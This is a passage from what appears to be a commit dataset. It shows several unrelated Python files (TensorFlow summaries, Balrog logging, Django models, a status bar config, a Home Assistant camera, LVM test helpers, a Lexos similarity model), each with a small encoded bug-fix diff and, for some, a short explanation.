    ops.add_to_collection(ops.GraphKeys.SUMMARIES, op)
  return op


def add_zero_fraction_summary(tensor, name=None, prefix=None,
                              print_summary=False):
  """Adds a summary for the percentage of zero values in the given tensor.

  Args:
    tensor: a variable or op tensor.
    name: the optional name for the summary.
    prefix: An optional prefix for the summary names.
    print_summary: If `True`, the summary is printed to stdout when the
      summary is computed.

  Returns:
    A scalar `Tensor` of type `string` whose contents are the serialized
    `Summary` protocol buffer.
  """
  name = _get_summary_name(tensor, name, prefix, 'Fraction of Zero Values')
  tensor = nn.zero_fraction(tensor)
  return add_scalar_summary(tensor, name, print_summary=print_summary)


def add_histogram_summaries(tensors, prefix=None):
  """Adds a histogram summary for each of the given tensors.

  Args:
    tensors: A list of variable or op tensors.
    prefix: An optional prefix for the summary names.

  Returns:
    A list of scalar `Tensors` of type `string` whose contents are the
    serialized `Summary` protocol buffer.
  """
  summary_ops = []
  for tensor in tensors:
    summary_ops.append(add_histogram_summary(tensor, prefix=prefix))
  return summary_ops


def add_image_summaries(tensors, prefix=None):
  """Adds an image summary for each of the given tensors.

  Args:
    tensors: A list of variable or op tensors.
    prefix: An optional prefix for the summary names.

  Returns:
    A list of scalar `Tensors` of type `string` whose contents are the
    serialized `Summary` protocol buffer.
  """
  summary_ops = []
  for tensor in tensors:
    summary_ops.append(add_image_summary(tensor, prefix=prefix))
  return summary_ops


def add_scalar_summaries(tensors, prefix=None, print_summary=False):
  """Adds a scalar summary for each of the given tensors.

  Args:
    tensors: a list of variable or op tensors.
    prefix: An optional prefix for the summary names.
    print_summary: If `True`, the summary is printed to stdout when the
      summary is computed.

  Returns:
    A list of scalar `Tensors` of type `string` whose contents are the
    serialized `Summary` protocol buffer.
  """
  summary_ops = []
  for tensor in tensors:
    summary_ops.append(add_scalar_summary(tensor, prefix=prefix,
                                          print_summary=print_summary))
  return summary_ops


def add_zero_fraction_summaries(tensors, prefix=None):
  """Adds a scalar zero-fraction summary for each of the given tensors.

  Args:
    tensors: a list of variable or op tensors.
    prefix: An optional prefix for the summary names.

  Returns:
    A list of scalar `Tensors` of type `string` whose contents are the
    serialized `Summary` protocol buffer.
  """
  summary_ops = []
  for tensor in tensors:
    summary_ops.append(add_zero_fraction_summary(tensor, prefix=prefix))
  return summary_ops
Python
0.000012
@@ -5223,17 +5223,17 @@ tion - of +_of_ Zero - +_ Valu
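The one-character subject is doing real work here: TensorFlow summary tags may only contain (roughly) letters, digits, and the characters _ . - /, so the literal spaces in 'Fraction of Zero Values' would be rewritten by TF at runtime with a warning. Replacing them up front keeps the tag stable. A small sketch of the sanitization rule, with the character class an assumption based on TF's op-name rules:

import re

# Replace anything outside the op-name alphabet with an underscore,
# which is what TF itself would do implicitly.
def sanitize_summary_name(name):
    return re.sub(r"[^A-Za-z0-9_.\-/]", "_", name)

print(sanitize_summary_name("Fraction of Zero Values"))
# Fraction_of_Zero_Values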
40eb7ede3a223ec89c28a43abb8d626027e2dc12
Fix logging message omission. (#1022)
auslib/log.py
auslib/log.py
import json
import logging
import socket
import sys
import traceback

from flask import request

log_format = "%(asctime)s - %(levelname)s - PID: %(process)s - Request: %(requestid)s - %(name)s.%(funcName)s#%(lineno)s: %(message)s"


class BalrogLogger(logging.Logger):
    def makeRecord(self, name, level, fn, lno, msg, args, exc_info, func=None, extra=None, sinfo=None):
        if extra is None:
            extra = {}
        if "requestid" not in extra:
            # Not all logging will be done from within a request
            # (eg, initial logging at start up). We need to be able to cope
            # with that.
            requestid = "None"
            try:
                # "request" is a proxy object that passes along operations
                # to the real object. _get_current_object gives us the true
                # Request object, whose id is actually what we want.
                # Without this we end up with the id of the proxy object, which
                # is static for the life of the application.
                # TODO: this doesn't seem to be 100% unique.
                # Sometimes requests that happen around the same time will
                # end up with the same value here. Possibly only when the
                # query strings are the same, or srcip?
                requestid = str(id(request._get_current_object()))
            # RuntimeError will be raised if there's no active request.
            except RuntimeError:
                pass
            extra["requestid"] = requestid
        return logging.Logger.makeRecord(self, name, level, fn, lno, msg, args, exc_info, func, extra, sinfo)  # pragma: no cover


class JsonLogFormatter(logging.Formatter):
    """Log formatter that outputs machine-readable json.

    This log formatter outputs JSON format messages that are compatible with
    Mozilla's standard heka-based log aggregation infrastructure.

    See also:
    https://mana.mozilla.org/wiki/display/CLOUDSERVICES/Logging+Standard
    https://mana.mozilla.org/wiki/pages/viewpage.action?pageId=42895640

    Adapted from:
    https://github.com/mozilla-services/mozservices/blob/master/mozsvc/util.py#L106
    """

    LOGGING_FORMAT_VERSION = "2.0"
    # Map from Python logging to Syslog severity levels
    SYSLOG_LEVEL_MAP = {logging.DEBUG: 2, logging.ERROR: 3, logging.WARNING: 4, logging.INFO: 6, logging.DEBUG: 7}
    # Syslog level to use when/if python level isn't found in map
    DEFAULT_SYSLOG_LEVEL = 7
    EXCLUDED_LOGRECORD_ATTRS = set(
        (
            "args",
            "asctime",
            "created",
            "exc_info",
            "exc_text",
            "filename",
            "funcName",
            "levelname",
            "levelno",
            "lineno",
            "module",
            "msecs",
            "message",
            "msg",
            "name",
            "pathname",
            "process",
            "processName",
            "relativeCreated",
            "stack_info",
            "thread",
            "threadName",
        )
    )

    def __init__(self, fmt=None, datefmt=None, logger_name="Balrog"):
        self.logger_name = logger_name
        self.hostname = socket.gethostname()
        logging.Formatter.__init__(self, fmt, datefmt)

    def format(self, record):
        """
        Map from Python LogRecord attributes to JSON log format fields

        * from - https://docs.python.org/3/library/logging.html#logrecord-attributes
        * to - https://mana.mozilla.org/wiki/pages/viewpage.action?pageId=42895640
        """
        out = dict(
            Timestamp=int(record.created * 1e9),
            Type=record.name,
            Logger=self.logger_name,
            Hostname=self.hostname,
            EnvVersion=self.LOGGING_FORMAT_VERSION,
            Severity=self.SYSLOG_LEVEL_MAP.get(record.levelno, self.DEFAULT_SYSLOG_LEVEL),
            Pid=record.process,
        )

        # Include any custom attributes set on the record.
        # These would usually be collected metrics data.
        fields = dict()
        for key, value in record.__dict__.items():
            if key not in self.EXCLUDED_LOGRECORD_ATTRS:
                fields[key] = value

        # Only include the 'message' key if it has useful content
        # and is not already a JSON blob.
        message = record.getMessage()
        if message:
            if not message.startswith("{") and not message.endswith("}"):
                fields["message"] = message

        # If there is an error, format it for nice output.
        if record.exc_info is not None:
            fields["error"] = repr(record.exc_info[1])
            fields["traceback"] = safer_format_traceback(*record.exc_info)

        out["Fields"] = fields

        return json.dumps(out)


def safer_format_traceback(exc_typ, exc_val, exc_tb):
    """Format an exception traceback into safer string.

    We don't want to let users write arbitrary data into our logfiles,
    which could happen if they e.g. managed to trigger a ValueError with
    a carefully-crafted payload. This function formats the traceback using
    "%r" for the actual exception data, which passes it through repr() so
    that any special chars are safely escaped.
    """
    lines = ["Uncaught exception:\n"]
    lines.extend(traceback.format_tb(exc_tb))
    lines.append("%r\n" % (exc_typ,))
    lines.append("%r\n" % (exc_val,))
    return "".join(lines)


def configure_logging(stream=sys.stdout, formatter=JsonLogFormatter, format_=log_format, level=logging.DEBUG):
    logging.setLoggerClass(BalrogLogger)
    handler = logging.StreamHandler(stream)
    formatter = formatter(fmt=format_)
    handler.setFormatter(formatter)
    logging.root.addHandler(handler)
    logging.root.setLevel(level)
Python
0.003285
@@ -4417,19 +4417,18 @@ th(%22%7B%22) -and +or not mes
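The one-word diff is a De Morgan fix. "Not already a JSON blob" is not (msg.startswith("{") and msg.endswith("}")), which expands to not-startswith or not-endswith; the old and silently dropped any message that matched only one of the two tests. A self-checking sketch:

# not (A and B) == (not A) or (not B); the old "and" omitted messages
# that merely started with '{' or merely ended with '}'.
def should_include(msg):
    return bool(msg) and (not msg.startswith("{") or not msg.endswith("}"))

assert should_include("plain text")            # kept
assert should_include("closing brace }")       # wrongly dropped before the fix
assert not should_include('{"key": "value"}')  # a real JSON blob stays excluded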
7755c117e354871bbc06c98d0709545cee2032ba
Add versioning managers
share/models/base.py
share/models/base.py
import uuid
import inspect

from django.db import models
from django.conf import settings
from django.db import transaction
from django.db.models.base import ModelBase
from django.db.models.fields.related import lazy_related_operation

from share.models.core import RawData
from share.models.core import ShareUser


class AbstractShareObject(models.Model):
    # id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    source = models.ForeignKey(ShareUser)
    source_data = models.ForeignKey(RawData, blank=True, null=True)  # NULL/None indicates a user submitted change

    changed_at = models.DateTimeField(auto_now=True)
    created_at = models.DateTimeField(auto_now=True)

    class Meta:
        abstract = True


class ShareObjectVersion(models.Model):
    action = models.CharField(max_length=10);
    persistant_id = models.PositiveIntegerField()  # Must match the id of ShareObject

    class Meta:
        abstract = True


class ShareForeignKey(models.ForeignKey):

    def __init__(self, model, **kwargs):
        self.__kwargs = kwargs
        super().__init__(model, **kwargs)

    def contribute_to_class(self, cls, name, **kwargs):
        actual = self.__class__.mro()[1](self.remote_field.model, **self.__kwargs)
        actual.contribute_to_class(cls, name, **kwargs)

        self.__kwargs['editable'] = False
        version = self.__class__.mro()[1](self.remote_field.model.VersionModel, **self.__kwargs)
        version.contribute_to_class(cls, name + '_version', **kwargs)


class ShareManyToMany(models.ManyToManyField):

    def __init__(self, model, **kwargs):
        self.__kwargs = kwargs
        super().__init__(model, **kwargs)

    def contribute_to_class(self, cls, name, **kwargs):
        actual = self.__class__.mro()[1](self.remote_field.model, **self.__kwargs)
        actual.contribute_to_class(cls, name, **kwargs)

        self.__kwargs['through'] += 'Version'
        self.__kwargs['editable'] = False
        version = self.__class__.mro()[1](self.remote_field.model.VersionModel, **self.__kwargs)
        version.contribute_to_class(cls, name[:-1] + '_versions', **kwargs)


class ShareObjectMeta(ModelBase):

    def __new__(cls, name, bases, attrs):
        if models.Model in bases or len(bases) > 1:
            return super(ShareObjectMeta, cls).__new__(cls, name, bases, attrs)

        module = attrs['__module__']

        if not attrs.get('Meta'):
            attrs['Meta'] = type('Meta', (object, ), {})
        attrs['Meta'].abstract = True
        attrs['__qualname__'] = 'Abstract' + attrs['__qualname__']
        abstract = super(ShareObjectMeta, cls).__new__(cls, 'Abstract' + name, (AbstractShareObject, ), attrs)

        version = type(
            name + 'Version',
            (abstract, ShareObjectVersion),
            {'__module__': module}
        )

        concrete = super(ShareObjectMeta, cls).__new__(cls, name, (abstract, ShareObject), {
            '__module__': module,
            'version': models.OneToOneField(version, on_delete=models.PROTECT, related_name='%(app_label)s_%(class)s_version')
        })

        concrete.VersionModel = version

        inspect.stack()[1].frame.f_globals.update({concrete.VersionModel.__name__: concrete.VersionModel})

        return concrete


class ShareObject(models.Model, metaclass=ShareObjectMeta):
    id = models.AutoField(primary_key=True)

    class Meta:
        abstract = True
Python
0
@@ -686,24 +686,28 @@ eld(auto_now +_add =True)%0A%0A @@ -949,32 +949,69 @@ abstract = True%0A + ordering = ('-changed_at', )%0A %0A%0Aclass ShareFor @@ -3010,16 +3010,53 @@ module,%0A + 'VersionModel': version,%0A @@ -3198,49 +3198,8 @@ -concrete.VersionModel = version%0A%0A insp @@ -3317,16 +3317,932 @@ concrete +%0A%0A%0Aclass VersionManagerDescriptor:%0A%0A def __init__(self, model):%0A self.model = model%0A%0A def __get__(self, instance, type=None):%0A if instance is not None:%0A return VersionManager(self.model, instance)%0A return VersionManager(self.model, instance)%0A%0Aclass VersionManager(models.Manager):%0A%0A def __init__(self, model=None, instance=None):%0A super().__init__()%0A self.model = model%0A self.instance = instance%0A%0A def get_queryset(self):%0A qs = self._queryset_class(model=self.model.VersionModel, using=self._db, hints=self._hints).order_by('-changed_at')%0A if self.instance:%0A return qs.filter(persistant_id=self.instance.id)%0A return qs%0A%0A def contribute_to_class(self, model, name):%0A super().contribute_to_class(model, name)%0A if not model._meta.abstract:%0A setattr(model, name, VersionManagerDescriptor(model)) %0A%0A%0Aclass @@ -4335,24 +4335,87 @@ ry_key=True) +%0A objects = models.Manager()%0A versions = VersionManager() %0A%0A class
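The diff's VersionManagerDescriptor exists so that Model.versions works both on the class (all versions) and on an instance (versions filtered to that object's persistant_id). A reduced, Django-free sketch of the same descriptor trick; the class and data here are invented for illustration:

# __get__ receives instance=None for class access, letting one attribute
# serve as both an unfiltered and a per-instance query.
class VersionsDescriptor:
    def __get__(self, instance, owner=None):
        history = getattr(owner, '_history', [])
        if instance is None:
            return list(history)
        return [v for v in history if v['id'] == instance.id]

class Record:
    _history = [{'id': 1, 'rev': 1}, {'id': 2, 'rev': 1}, {'id': 1, 'rev': 2}]
    versions = VersionsDescriptor()

    def __init__(self, id):
        self.id = id

print(len(Record.versions))     # 3: every stored version
print(len(Record(1).versions))  # 2: only versions of record 1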
0ef0e6c1d130dd25ec9dd9618ffcfc9f85913137
Add dock interface
barpyrus.py
barpyrus.py
import sys
import contextlib

from barpyrus import hlwm
from barpyrus import widgets as W
from barpyrus.core import Theme, Painter
from barpyrus import lemonbar
from barpyrus import conky

@contextlib.contextmanager
def maybe_orange(match, predicate='> 90'):
    with cg.if_('match ${%s} %s' % (match, predicate)):
        cg.fg('#ffc726')
    yield
    cg.fg(None)

def underlined_tags(taginfo, painter):
    if taginfo.empty:
        return
    painter.set_flag(painter.underline, True if taginfo.visible else False)
    painter.fg('#a0a0a0' if taginfo.occupied else '#909090')
    if taginfo.urgent:
        painter.ol('#FF7F27')
        painter.fg('#FF7F27')
        painter.set_flag(Painter.underline, True)
        painter.bg('#57000F')
    elif taginfo.here:
        painter.fg('#ffffff')
        painter.ol(taginfo.activecolor if taginfo.focused else '#ffffff')
        painter.bg(taginfo.emphbg)
    else:
        painter.ol('#454545')
    painter.space(3)
    painter += taginfo.name
    painter.space(3)
    painter.bg()
    painter.ol()
    painter.set_flag(painter.underline, False)
    painter.space(2)

hc = hlwm.connect()

monitor = sys.argv[1] if len(sys.argv) >= 2 else 0
x, y, monitor_w, monitor_h = hc.monitor_rect(monitor)
height = 16
width = monitor_w
hc(['pad', str(monitor), str(height)])

cg = conky.ConkyGenerator(lemonbar.textpainter())

## CPU / RAM / df
with cg.temp_fg('#9fbc00'):
    cg.symbol(0xe026)
cg.space(5)
for cpu in '1234':
    with maybe_orange('cpu cpu%s' % cpu):
        cg.var('cpu cpu' + cpu)
        cg.text('% ')
with cg.temp_fg('#9fbc00'):
    cg.symbol(0xe021)
cg.space(5)
with maybe_orange('memperc'):
    cg.var('memperc')
    cg.text('% ')
with cg.temp_fg('#9fbc00'):
    cg.symbol(0x00e1bb)
cg.space(5)
with maybe_orange('fs_used_perc /'):
    cg.var('fs_used_perc /')
    cg.text('% ')

## Network
wifi_icons = [0xe217, 0xe218, 0xe219, 0xe21a]
wifi_delta = 100 / len(wifi_icons)
with cg.if_('up tun0'):
    with cg.temp_fg('#ff0000'):
        cg.symbol(0xe0a6)
for iface in ['eth', 'wlan', 'ppp0']:
    with cg.if_('up %s' % iface), cg.if_('match "${addr %s}" != "No Address"' % iface):
        with cg.temp_fg('#9fbc00'):
            if iface == 'wlan':
                with cg.cases():
                    for i, icon in enumerate(wifi_icons[:-1]):
                        cg.case('match ${wireless_link_qual_perc wlan} < %d' % ((i+1)*wifi_delta))
                        cg.symbol(icon)
                    cg.else_()
                    cg.symbol(wifi_icons[-1])  # icon for 100 percent
                cg.space(5)
            elif iface == 'eth':
                cg.symbol(0xe0af)
            elif iface == 'ppp0':
                cg.symbol(0xe0f3)
            else:
                assert False
        if iface == 'wlan':
            cg.var('wireless_essid')
        if iface != 'ppp0':
            cg.space(5)
            cg.var('addr %s' % iface)
        cg.space(5)
        with cg.temp_fg('#9fbc00'):
            cg.symbol(0xe13c)
        cg.var('downspeedf %s' % iface)
        cg.text('K ')
        cg.var('totaldown %s' % iface)
        cg.space(5)
        with cg.temp_fg('#9fbc00'):
            cg.symbol(0xe13b)
        cg.var('upspeedf %s' % iface)
        cg.text('K ')
        cg.var('totalup %s' % iface)
        cg.space(5)

## Battery
# first icon: 0 percent
# last icon: 100 percent
bat_icons = [
    0xe242, 0xe243, 0xe244, 0xe245, 0xe246,
    0xe247, 0xe248, 0xe249, 0xe24a, 0xe24b,
]
bat_delta = 100 / len(bat_icons)
with cg.if_('existing /sys/class/power_supply/BAT0'):
    cg.fg('#9fbC00')
    with cg.if_('match "$battery" != "discharging $battery_percent%"'):
        cg.symbol(0xe0db)
    with cg.cases():
        for i, icon in enumerate(bat_icons[:-1]):
            cg.case('match $battery_percent < %d' % ((i+1)*bat_delta))
            cg.symbol(icon)
        cg.else_()
        cg.symbol(bat_icons[-1])  # icon for 100 percent
    cg.fg(None)
    cg.space(5)
    with maybe_orange('battery_percent', '< 10'):
        cg.var('battery_percent')
        cg.text('% ')
    cg.var('battery_time')
    cg.space(5)

with cg.temp_fg('#9fbc00'):
    cg.symbol(0xe015)
cg.space(5)
cg.var('time %d. %B, %H:%M')

conky_config = {
    'update_interval': '5',
}

# Widget configuration:
bar = lemonbar.Lemonbar(geometry = (x,y,width,height))
bar.widget = W.ListLayout([
    W.RawLabel('%{l}'),
    hlwm.HLWMTags(hc, monitor, tag_renderer=underlined_tags),
    W.RawLabel('%{c}'),
    hlwm.HLWMWindowTitle(hc),
    W.RawLabel('%{r}'),
    conky.ConkyWidget(text=str(cg), config=conky_config),
])
Python
0
@@ -2037,16 +2037,24 @@ %5B'eth', + 'dock', 'wlan', @@ -2611,16 +2611,26 @@ ace -== +in %5B 'eth' +, 'dock'%5D :%0A
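Both hunks extend the existing wired-interface handling to the new dock interface; the second one swaps an equality check for a membership test so a single branch covers both. A two-line illustration of that idiom:

iface = 'dock'
print(iface in ['eth', 'dock'])  # True; was `iface == 'eth'`, which missed dock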
bc4a37e3a93a68fa76c47bd355e1b028f0ca6c60
fix skynetqa url, add timeout and more graceful error handling
daft/scorebig/action.py
daft/scorebig/action.py
__author__ = 'bkeroack'

import logging
import ec2
import salt.client
import requests
import re


class QualType:
    Corp = 0
    EC2 = 1
    CorpMaster = 'laxqualmaster'
    EC2Master = 'qualmaster001'


class QualTypeUnknown(Exception):
    pass


class UploadBuildAction:
    def __init__(self, **kwargs):
        #pattern match for prod Skynet registration
        self.rx = re.compile("^[0-9]{1,8}-(master|develop|sprint).*")
        self.build_name = kwargs['build_name']

    def go(self):
        ret = True
        if self.rx.match(self.build_name):
            logging.debug("UploadBuildAction: regexp matches: {}".format(self.build_name))
            ret = RegisterBuildSkynet(self.build_name).register()
        return ret and RegisterBuildSkynetQA(self.build_name).register()


class RegisterBuild:
    def __init__(self, url, build_name):
        self.url = url
        self.build_name = build_name

    def register(self):
        url = self.url.format(self.build_name)
        logging.debug("ScoreBig: Action: {}: url: {}".format(self.__class__.__name__, url))
        r = requests.post(url)
        resp = str(r.text).encode('ascii', 'ignore')
        logging.debug("ScoreBig: Action: {}: response: {}".format(self.__class__.__name__, resp))
        logging.debug("ScoreBIg: Action: {}: encoding: {}".format(self.__class__.__name__, r.encoding))
        return "ok" in resp


class RegisterBuildSkynet(RegisterBuild):
    def __init__(self, build_name):
        url = "http://skynet.scorebiginc.com/Hacks/RegisterBuild?buildNumber={}"
        RegisterBuild.__init__(self, url, build_name)


class RegisterBuildSkynetQA(RegisterBuild):
    def __init__(self, build_name):
        #url = "http://skynetqa.scorebiginc.com/DevQaTools/RegisterBuild?buildNumber={}"
        url = "http://laxsky001/DevQaTools/RegisterBuild?buildNumber={}"
        RegisterBuild.__init__(self, url, build_name)


class ProvisionQual:
    def __init__(self, qual_type, build):
        self.qual_type = qual_type
        self.build = build
        assert self.build.__class__.__name__ == 'Build'

    def start(self):
        self.verify_master_server()
        self.copy_build()
        self.shut_down_master()
        self.take_snapshot()
        self.create_qual()
        self.setup_qual()
        self.setup_dns()

    # generic master server:
    #   - verify up
    #   - copy build over
    #   - (shut down - optional?)
    # generic snapshot:
    #   - take snapshot of build volume
    # generic new server:
    #   - create new server based on generic server image (ami/vhd)
    #   - loop on creation until up
    # generic uptime tasks:
    #   - IIS bindings
    #   - service start
    #   - bootstrapping
    # generic DNS
    #   - create DNS A record


class SaltClient:
    def __init__(self):
        self.client = salt.client.LocalClient()

    def powershell(self, target, cmd, target_type='glob', timeout=120):
        return self.client.cmd(target, 'cmd.run', cmd, timeout=timeout, expr_form=target_type, shell='powershell')

    def cmd(self, target, cmd, args, target_type='glob', timeout=60):
        return self.client.cmd(target, cmd, args, timeout=timeout, expr_form=target_type)

    def ping(self, target):
        return
Python
0
@@ -1070,16 +1070,33 @@ , url))%0A + try:%0A @@ -1116,17 +1116,153 @@ post(url -) +, timeout=45)%0A except requests.ConnectionError:%0A return False%0A except requests.Timeout:%0A return False %0A @@ -1842,17 +1842,16 @@ -# url = %22h @@ -1922,32 +1922,33 @@ ber=%7B%7D%22%0A +# url = %22http://la
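The diff bounds the registration request with timeout=45 and converts the two transport failures into a False return instead of an unhandled exception. A sketch of the resulting shape of register(), with the URL formatting elided:

import requests

# Bound the call and degrade to a boolean on network failure, as the
# diff does inside RegisterBuild.register().
def register(url, timeout=45):
    try:
        r = requests.post(url, timeout=timeout)
    except requests.ConnectionError:
        return False
    except requests.Timeout:
        return False
    return "ok" in r.text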
588fb283cc82be28d3fb28bb6a8896c42d1a7eee
Fix the CONF_LOOP check to use the config (#38890)
homeassistant/components/environment_canada/camera.py
homeassistant/components/environment_canada/camera.py
"""Support for the Environment Canada radar imagery.""" import datetime import logging from env_canada import ECRadar import voluptuous as vol from homeassistant.components.camera import PLATFORM_SCHEMA, Camera from homeassistant.const import ( ATTR_ATTRIBUTION, CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME, ) import homeassistant.helpers.config_validation as cv from homeassistant.util import Throttle _LOGGER = logging.getLogger(__name__) ATTR_UPDATED = "updated" CONF_ATTRIBUTION = "Data provided by Environment Canada" CONF_STATION = "station" CONF_LOOP = "loop" CONF_PRECIP_TYPE = "precip_type" MIN_TIME_BETWEEN_UPDATES = datetime.timedelta(minutes=10) PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend( { vol.Optional(CONF_LOOP, default=True): cv.boolean, vol.Optional(CONF_NAME): cv.string, vol.Optional(CONF_STATION): cv.matches_regex(r"^C[A-Z]{4}$|^[A-Z]{3}$"), vol.Inclusive(CONF_LATITUDE, "latlon"): cv.latitude, vol.Inclusive(CONF_LONGITUDE, "latlon"): cv.longitude, vol.Optional(CONF_PRECIP_TYPE): ["RAIN", "SNOW"], } ) def setup_platform(hass, config, add_devices, discovery_info=None): """Set up the Environment Canada camera.""" if config.get(CONF_STATION): radar_object = ECRadar( station_id=config[CONF_STATION], precip_type=config.get(CONF_PRECIP_TYPE) ) else: lat = config.get(CONF_LATITUDE, hass.config.latitude) lon = config.get(CONF_LONGITUDE, hass.config.longitude) radar_object = ECRadar( coordinates=(lat, lon), precip_type=config.get(CONF_PRECIP_TYPE) ) add_devices([ECCamera(radar_object, config.get(CONF_NAME))], True) class ECCamera(Camera): """Implementation of an Environment Canada radar camera.""" def __init__(self, radar_object, camera_name): """Initialize the camera.""" super().__init__() self.radar_object = radar_object self.camera_name = camera_name self.content_type = "image/gif" self.image = None self.timestamp = None def camera_image(self): """Return bytes of camera image.""" self.update() return self.image @property def name(self): """Return the name of the camera.""" if self.camera_name is not None: return self.camera_name return "Environment Canada Radar" @property def device_state_attributes(self): """Return the state attributes of the device.""" attr = {ATTR_ATTRIBUTION: CONF_ATTRIBUTION, ATTR_UPDATED: self.timestamp} return attr @Throttle(MIN_TIME_BETWEEN_UPDATES) def update(self): """Update radar image.""" if CONF_LOOP: self.image = self.radar_object.get_loop() else: self.image = self.radar_object.get_latest_frame() self.timestamp = self.radar_object.timestamp
Python
0
@@ -1645,16 +1645,25 @@ devices( +%0A %5BECCamer @@ -1703,16 +1703,35 @@ AME) +, config%5BCONF_LOOP%5D )%5D, True )%0A%0A%0A @@ -1726,16 +1726,21 @@ )%5D, True +%0A )%0A%0A%0Aclas @@ -1872,16 +1872,25 @@ era_name +, is_loop ):%0A @@ -1990,16 +1990,16 @@ _object%0A - @@ -2021,32 +2021,63 @@ e = camera_name%0A + self.is_loop = is_loop%0A self.con @@ -2798,25 +2798,28 @@ if -CONF_LOOP +self.is_loop :%0A
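The bug being fixed: `if CONF_LOOP:` tested the constant string "loop", which is always truthy, so the camera always served the animated loop regardless of configuration. The diff threads the configured boolean into the entity as is_loop instead. A minimal demonstration of the truthiness trap:

CONF_LOOP = "loop"           # a non-empty string is always truthy
config = {CONF_LOOP: False}  # the user asked for a single frame

print(bool(CONF_LOOP))          # True: the old check ignored the config
print(bool(config[CONF_LOOP]))  # False: what the fixed code consults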
c96cccbe7afc282aedbb316a2e9e41e47e68bcb6
fix efs lvm create (#610)
chroma-manager/tests/integration/utils/test_blockdevices/test_blockdevice_lvm.py
chroma-manager/tests/integration/utils/test_blockdevices/test_blockdevice_lvm.py
# Copyright (c) 2017 Intel Corporation. All rights reserved.
# Use of this source code is governed by a MIT-style
# license that can be found in the LICENSE file.


import re

from tests.integration.utils.test_blockdevices.test_blockdevice import TestBlockDevice


class TestBlockDeviceLvm(TestBlockDevice):
    _supported_device_types = ['lvm']

    def __init__(self, device_type, device_path):
        super(TestBlockDeviceLvm, self).__init__(device_type, device_path)

    @property
    def preferred_fstype(self):
        return 'ldiskfs'

    # Create a lvm on the device.
    @property
    def prepare_device_commands(self):
        # FIXME: the use of --yes in the {vg,lv}create commands is a work-around for #500
        # and should be reverted when #500 is fixed
        return [
            "vgcreate --yes %s %s; lvcreate --yes --wipesignatures n -l 100%%FREE --name %s %s"
            % (self.vg_name, self._device_path, self.lv_name, self.vg_name)
        ]

    @property
    def vg_name(self):
        return "vg_%s" % "".join(
            [c for c in self._device_path if re.match(r'\w', c)])

    @property
    def lv_name(self):
        return "lv_%s" % "".join(
            [c for c in self._device_path if re.match(r'\w', c)])

    @property
    def device_path(self):
        return "/dev/%s/%s" % (self.vg_name, self.lv_name)

    @classmethod
    def clear_device_commands(cls, device_paths):
        lv_destroy = [
            "if lvdisplay /dev/{0}/{1}; then lvchange -an /dev/{0}/{1} && lvremove /dev/{0}/{1}; else exit 0; fi".
            format(
                TestBlockDeviceLvm('lvm', device_path).vg_name,
                TestBlockDeviceLvm('lvm', device_path).lv_name)
            for device_path in device_paths
        ]
        vg_destroy = [
            "if vgdisplay {0}; then vgremove {0}; else exit 0; fi".format(
                TestBlockDeviceLvm('lvm', device_path).vg_name)
            for device_path in device_paths
        ]

        return lv_destroy + vg_destroy

    @property
    def install_packages_commands(self):
        return []
Python
0
@@ -783,16 +783,70 @@ eturn %5B%0A + %22wipefs -a %7B%7D%22.format(self._device_path),%0A
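The fix prepends a wipefs call so stale filesystem or LVM signatures on a reused test device cannot make vgcreate prompt or refuse. A sketch of the assembled command list, with illustrative device and VG/LV names:

device = "/dev/sdb"
vg, lv = "vg_devsdb", "lv_devsdb"
commands = [
    "wipefs -a {}".format(device),  # scrub old signatures first
    "vgcreate --yes %s %s; lvcreate --yes --wipesignatures n -l 100%%FREE --name %s %s"
    % (vg, device, lv, vg),
]
print("\n".join(commands))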
64b225f64a26cacff5609d2c2083a4f7f406a2c3
complete bug fix
lexos/models/similarity_model.py
lexos/models/similarity_model.py
from typing import Optional

import numpy as np
import pandas as pd
from sklearn.metrics.pairwise import cosine_similarity

from lexos.models.base_model import BaseModel
from lexos.helpers.error_messages import NON_NEGATIVE_INDEX_MESSAGE
from lexos.models.matrix_model import MatrixModel
from lexos.receivers.matrix_receiver import IdTempLabelMap
from lexos.receivers.similarity_receiver import SimilarityOption, \
    SimilarityReceiver


class SimilarityModel(BaseModel):
    def __init__(self, test_dtm: Optional[pd.DataFrame] = None,
                 test_option: Optional[SimilarityOption] = None,
                 test_id_temp_label_map: Optional[IdTempLabelMap] = None):
        """This is the class to generate similarity.

        :param test_dtm: (fake parameter)
            the doc term matrix used for testing.
        :param test_option: (fake parameter)
            the similarity option used for testing.
        :param test_id_temp_label_map: (fake parameter)
            the id temp label map used for testing.
        """
        super().__init__()
        self._test_dtm = test_dtm
        self._test_option = test_option
        self._test_id_temp_label_map = test_id_temp_label_map

    @property
    def _doc_term_matrix(self) -> pd.DataFrame:
        """:return: the document term matrix."""
        return self._test_dtm if self._test_dtm is not None \
            else MatrixModel().get_matrix()

    @property
    def _id_temp_label_map(self) -> IdTempLabelMap:
        """:return: a map takes an id to temp labels."""
        return self._test_id_temp_label_map \
            if self._test_id_temp_label_map is not None \
            else MatrixModel().get_temp_label_id_map()

    @property
    def _similarity_option(self) -> SimilarityOption:
        """:return: the similarity option."""
        return self._test_option if self._test_option is not None \
            else SimilarityReceiver().options_from_front_end()

    def _similarity_maker(self) -> pd.DataFrame:
        """this function generate the result of cos-similarity between files

        :return: docs_score: a parallel list with `docs_name`, is an
            array of the cos-similarity distance
        :return: docs_name: a parallel list with `docs_score`, is an
            array of the name (temp labels)
        """
        # precondition
        assert self._similarity_option.comp_file_id >= 0, \
            NON_NEGATIVE_INDEX_MESSAGE

        # get labels
        labels = [self._id_temp_label_map[file_id]
                  for file_id in self._doc_term_matrix.index.values]

        # get cosine_similarity
        dist = 1 - cosine_similarity(self._doc_term_matrix.values)

        # get an array of file index in file manager files
        other_file_indexes = np.where(self._doc_term_matrix.index !=
                                      self._similarity_option.comp_file_id)[0]
        select_file_indexes = np.where(self._doc_term_matrix.index ==
                                       self._similarity_option.comp_file_id)[0]

        # construct an array of scores
        Test = [dist[file_index, select_file_indexes]
                for file_index in other_file_indexes]
        docs_score_array = np.asarray(
            [dist[file_index, select_file_indexes]
             for file_index in other_file_indexes])

        # construct an array of names
        compared_file_label = np.asarray(
            [self._id_temp_label_map[file_id]
             for file_id in self._doc_term_matrix.index.values
             if file_id != self._similarity_option.comp_file_id])
        docs_name_array = np.asarray([labels[i]
                                      for i in list(other_file_indexes)])

        # sort the score array
        sorted_score_array = np.sort(docs_score_array)

        # round the score array to 4 decimals
        final_score_array = np.round(sorted_score_array, decimals=4)

        # sort the name array in terms of the score array
